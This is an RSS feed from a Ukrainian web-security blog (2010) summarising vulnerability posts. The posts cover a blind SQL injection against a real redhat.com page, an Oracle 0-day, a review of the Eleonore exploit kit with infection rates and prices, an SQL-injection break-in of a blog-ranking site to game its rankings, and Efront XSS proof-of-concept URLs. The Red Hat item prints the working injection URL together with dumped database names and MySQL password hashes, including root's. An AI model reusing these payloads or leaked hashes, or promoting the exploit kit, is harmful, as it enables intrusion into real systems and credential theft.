<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Ukrainian Security Community - Блог спеціалістів з безпеки веб-додатків &#187; Вразливості \ vulnerabilities</title>
	<atom:link href="http://uasc.org.ua/category/security/vuln-security/feed/" rel="self" type="application/rss+xml" />
	<link>http://uasc.org.ua</link>
	<description>Ukrainian Security Community - Блог спеціалістів з безпеки веб-додатків</description>
	<lastBuildDate>Tue, 27 Jul 2010 17:28:19 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Знімаємо капелюха або .redhat.com sql-inj ;-)</title>
		<link>http://uasc.org.ua/2010/04/%d0%b7%d0%bd%d1%96%d0%bc%d0%b0%d1%94%d0%bc%d0%be-%d0%ba%d0%b0%d0%bf%d0%b5%d0%bb%d1%8e%d1%85%d0%b0-redhat-sql-inj/</link>
		<comments>http://uasc.org.ua/2010/04/%d0%b7%d0%bd%d1%96%d0%bc%d0%b0%d1%94%d0%bc%d0%be-%d0%ba%d0%b0%d0%bf%d0%b5%d0%bb%d1%8e%d1%85%d0%b0-redhat-sql-inj/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 10:17:59 +0000</pubDate>
		<dc:creator>snake</dc:creator>
				<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[redhat.com]]></category>
		<category><![CDATA[sql-inj]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=899</guid>
		<description><![CDATA[Після невдалого rfi\lfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y.
Не буду тягнуть кота за яйця:


http://www.es.redhat.com/training/register.php?course=EX333&#38;date=20101119+скуля--+&#38;country=BE3&#38;ref_id=

@@tmpdir: /tmp/
@@basedir: /usr/
version(): 5.0.77-log
database(): redhateurope
user(): www@localhost
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu  (що не дивно ))))
redhatapac
redhatcn
test
email
redhates
_orms
redhatfr
box_us
redhatin
redhatbr
redhatit
redhatde
redhatkr
mysql
redhateurope
information_schema
drupal
redhatglobal
redhatcz
redhatlatam
mysql.user
www:*49D3CEBD189B8C5D4A47C975133BB2357A327585
repl:*F317577FF00A2A4112982CAE6A174DF23557C02F
root:*F317577FF00A2A4112982CAE6A174DF23557C02F
drupal:*7AFEAE5774E672996251E09B946CB3953FC67656
 

]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/%d0%b7%d0%bd%d1%96%d0%bc%d0%b0%d1%94%d0%bc%d0%be-%d0%ba%d0%b0%d0%bf%d0%b5%d0%bb%d1%8e%d1%85%d0%b0-redhat-sql-inj/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>TARGET: ORACLE. 0day експлойт</title>
		<link>http://uasc.org.ua/2010/04/oracle-zeroday/</link>
		<comments>http://uasc.org.ua/2010/04/oracle-zeroday/#comments</comments>
		<pubDate>Mon, 12 Apr 2010 10:58:50 +0000</pubDate>
		<dc:creator>dsu</dc:creator>
				<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[DBMS_JOB PACKAGE]]></category>
		<category><![CDATA[find_date]]></category>
		<category><![CDATA[FUNCTION]]></category>
		<category><![CDATA[oracle]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[zeroday]]></category>
		<category><![CDATA[експлойт]]></category>
		<category><![CDATA[зіродей]]></category>
		<category><![CDATA[зиродей]]></category>
		<category><![CDATA[оракл]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=892</guid>
		<description><![CDATA[Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.

...
30    CUR := DBMS_SQL.OPEN_CURSOR;
31       BEGIN
32
33         DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/oracle-zeroday/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Тест зв&#8217;язки експлойтів Eleonore exploits pack</title>
		<link>http://uasc.org.ua/2010/03/%d1%82%d0%b5%d1%81%d1%82-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b8-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-eleonore-exploits-pack/</link>
		<comments>http://uasc.org.ua/2010/03/%d1%82%d0%b5%d1%81%d1%82-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b8-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-eleonore-exploits-pack/#comments</comments>
		<pubDate>Tue, 30 Mar 2010 15:10:18 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[auth]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[Eleonore]]></category>
		<category><![CDATA[Exmanoize]]></category>
		<category><![CDATA[loads]]></category>
		<category><![CDATA[pack]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[вразливості]]></category>
		<category><![CDATA[експлойти]]></category>
		<category><![CDATA[елеонор]]></category>
		<category><![CDATA[зв'язка]]></category>
		<category><![CDATA[сплойти]]></category>
		<category><![CDATA[тест]]></category>
		<category><![CDATA[трафік]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=870</guid>
		<description><![CDATA[Хочу надати вам інформацію про тестування зв&#8217;язки експлойтів  Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв&#8217;язки входять такі експлойти


MDAC
MS009-02
Telnet &#8211; Opera
Font tags &#8211; FireFox
PDF collab.getIcon
PDF Util.Printf
PDF collab.collectEmailInfo
DirectX DirectShow
Spreadsheet


Середній пробив характерний для звязки:

usa: 5-15%
mix: 10-25%

Ціни:

Власне зв&#8217;язка = 700$
Чищення від АВ = 50$
Ребілд на інший домен = 50$

Як не дивно, та в системі [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/%d1%82%d0%b5%d1%81%d1%82-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b8-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-eleonore-exploits-pack/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Виводим сайт в топ на UA TOP Bloggers або взлом top.blog.net.ua</title>
		<link>http://uasc.org.ua/2010/03/%d0%b2%d0%b8%d0%b2%d0%be%d0%b4%d0%b8%d0%bc-%d1%81%d0%b0%d0%b9%d1%82-%d0%b2-%d1%82%d0%be%d0%bf-%d0%bd%d0%b0-ua-top-bloggers-%d0%b0%d0%b1%d0%be-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-top-blog-net-ua/</link>
		<comments>http://uasc.org.ua/2010/03/%d0%b2%d0%b8%d0%b2%d0%be%d0%b4%d0%b8%d0%bc-%d1%81%d0%b0%d0%b9%d1%82-%d0%b2-%d1%82%d0%be%d0%bf-%d0%bd%d0%b0-ua-top-bloggers-%d0%b0%d0%b1%d0%be-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-top-blog-net-ua/#comments</comments>
		<pubDate>Fri, 26 Mar 2010 16:12:12 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[top.blog.net.ua]]></category>
		<category><![CDATA[UA TOP Bloggers]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[вивести в топ]]></category>
		<category><![CDATA[виводим]]></category>
		<category><![CDATA[накрутка]]></category>
		<category><![CDATA[скуля]]></category>
		<category><![CDATA[топ]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=863</guid>
		<description><![CDATA[Нещодавно мною були виявленні численні вразливості на сайті top.blog.net.ua. В той же день про це була повідомлена адміністрація проекту, але, нажаль відповіді я так і не отримав. Сподіваюсь цей пост спонукає їх виправити вразливості. А тепер блище до справи.
Що треба щоб бути в топі?
UA TOP Bloggers визначає позиції сайту за такими показниками:

Кількість хостів (унікальні користувачі)
Кількіст [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/%d0%b2%d0%b8%d0%b2%d0%be%d0%b4%d0%b8%d0%bc-%d1%81%d0%b0%d0%b9%d1%82-%d0%b2-%d1%82%d0%be%d0%bf-%d0%bd%d0%b0-ua-top-bloggers-%d0%b0%d0%b1%d0%be-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-top-blog-net-ua/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Міжсайтовий скриптинг в Efront 3.5.5</title>
		<link>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront-3-5-5/</link>
		<comments>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront-3-5-5/#comments</comments>
		<pubDate>Tue, 29 Dec 2009 16:43:56 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[efront]]></category>
		<category><![CDATA[vulnerabilitie]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=752</guid>
		<description><![CDATA[27.10.09
Програма: efront
Версія 3.5.5
Рівень небезпеки: Низький
Опис:
Вразливість дозволяє віддаленому користувачу провести XSS атаку.
На сайті efrontlearning.net запевняють що в релізі 2009/11/23 v3.5.5 build 5208 :
 • Added additional sanitization to eliminate xss attacks 

Насправді ж, можливість проведення XSS атаки залишилась( хоча periklis запевняв: &#8220;this issue is (supposed to be) solved in later versions&#8221; ). Параметр message_type недостатньо фільтруєтся. Приклад Passive [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront-3-5-5/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Міжсайтовий скриптинг в Efront</title>
		<link>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront/</link>
		<comments>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront/#comments</comments>
		<pubDate>Sun, 27 Dec 2009 12:53:11 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[efront]]></category>
		<category><![CDATA[vulnerabilities]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=747</guid>
		<description><![CDATA[27.10.09
Програма: efront
Версія 3.5.3
Рівень небезпеки: Низький
Опис:
Вразливість дозволяє віддаленому користувачу провести XSS атаку.
Вразливість існує через недостатню фільтрацію вхідних данних  в параметрах &#8220;lessons_ID&#8220;, &#8220;message&#8221; в сценарії index.php. Віддалений користувач має змогу за допомогою спеціально сформованого запиту виконати довільний код сценарію в браузері атакуємого.
PoC:
http://site.com/index.php?message=%3Cscript%3Ealert(document.cookie)%3C/script%3E&#38;message_type=success
http://site.com/index.php?ctg=lesson_info&#38;lessons_ID=5%3Cscript%3Ealert(document.cookie)%3C/script%3E
]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Oracle DBMS_SQLHASH.GETHASH exploit (perl)</title>
		<link>http://uasc.org.ua/2009/11/oracle-dbms_sqlhash-gethash-exploit-perl/</link>
		<comments>http://uasc.org.ua/2009/11/oracle-dbms_sqlhash-gethash-exploit-perl/#comments</comments>
		<pubDate>Sat, 28 Nov 2009 18:52:00 +0000</pubDate>
		<dc:creator>dsu</dc:creator>
				<category><![CDATA[Інше]]></category>
		<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[Кодинг]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[oracle]]></category>
		<category><![CDATA[PERL]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=683</guid>
		<description><![CDATA[Написав нескладний exploit, що використовує уразливість в DBMS_SQLHASH.GETHASH. Exploit для роботи потребує sql ін&#8217;єкцію в pl / sql процедурі (зазвичай, на Oracle Application server, там і належать такі процедури по дефолту користувачеві з правами, яких нам достатньо). Загалом  можна запитати, навіщо нам exploit, якщо є ін&#8217;єкція? Я відповім, що часто в таких процедурах йде простий [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/11/oracle-dbms_sqlhash-gethash-exploit-perl/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
